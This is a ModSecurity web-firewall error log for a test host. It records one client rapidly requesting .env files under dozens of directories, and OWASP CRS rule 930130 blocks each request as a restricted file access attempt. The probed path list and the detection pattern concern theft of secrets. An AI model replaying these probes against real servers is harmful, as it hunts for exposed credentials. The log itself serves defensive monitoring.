[Sat Mar 21 04:07:56.322191 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPAAAAAA"]
[Sat Mar 21 04:07:56.322401 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPAAAAAA"]
[Sat Mar 21 04:07:56.322577 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPAAAAAA"]
[Sat Mar 21 04:07:56.616820 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPQAAAAA"]
[Sat Mar 21 04:07:56.616976 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPQAAAAA"]
[Sat Mar 21 04:07:56.617140 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPQAAAAA"]
[Sat Mar 21 04:07:56.912768 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPgAAAAA"]
[Sat Mar 21 04:07:56.912925 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPgAAAAA"]
[Sat Mar 21 04:07:56.913105 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplPgAAAAA"]
[Sat Mar 21 04:07:57.207155 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplPwAAAAA"]
[Sat Mar 21 04:07:57.208027 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplPwAAAAA"]
[Sat Mar 21 04:07:57.208211 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplPwAAAAA"]
[Sat Mar 21 04:07:57.502468 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplQAAAAAA"]
[Sat Mar 21 04:07:57.502625 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplQAAAAAA"]
[Sat Mar 21 04:07:57.502788 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplQAAAAAA"]
[Sat Mar 21 04:07:57.797070 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplQQAAAAA"]
[Sat Mar 21 04:07:57.797264 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplQQAAAAA"]
[Sat Mar 21 04:07:57.797469 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "ab4LjbVOPlV6sIlrZCplQQAAAAA"]
[Sat Mar 21 04:07:58.091929 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplQgAAAAA"]
[Sat Mar 21 04:07:58.092084 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplQgAAAAA"]
[Sat Mar 21 04:07:58.092238 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplQgAAAAA"]
[Sat Mar 21 04:07:58.386524 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplQwAAAAA"]
[Sat Mar 21 04:07:58.386683 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplQwAAAAA"]
[Sat Mar 21 04:07:58.386844 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplQwAAAAA"]
[Sat Mar 21 04:07:58.681033 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplRAAAAAA"]
[Sat Mar 21 04:07:58.681189 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplRAAAAAA"]
[Sat Mar 21 04:07:58.681359 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplRAAAAAA"]
[Sat Mar 21 04:07:58.975607 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplRQAAAAA"]
[Sat Mar 21 04:07:58.975779 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplRQAAAAA"]
[Sat Mar 21 04:07:58.975947 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "ab4LjrVOPlV6sIlrZCplRQAAAAA"]
[Sat Mar 21 04:07:59.270114 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplRgAAAAA"]
[Sat Mar 21 04:07:59.270272 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplRgAAAAA"]
[Sat Mar 21 04:07:59.270448 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplRgAAAAA"]
[Sat Mar 21 04:07:59.564748 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplRwAAAAA"]
[Sat Mar 21 04:07:59.564914 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplRwAAAAA"]
[Sat Mar 21 04:07:59.565061 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplRwAAAAA"]
[Sat Mar 21 04:07:59.859394 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplSAAAAAA"]
[Sat Mar 21 04:07:59.859561 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplSAAAAAA"]
[Sat Mar 21 04:07:59.859718 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "ab4Lj7VOPlV6sIlrZCplSAAAAAA"]
[Sat Mar 21 04:08:00.154156 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSQAAAAA"]
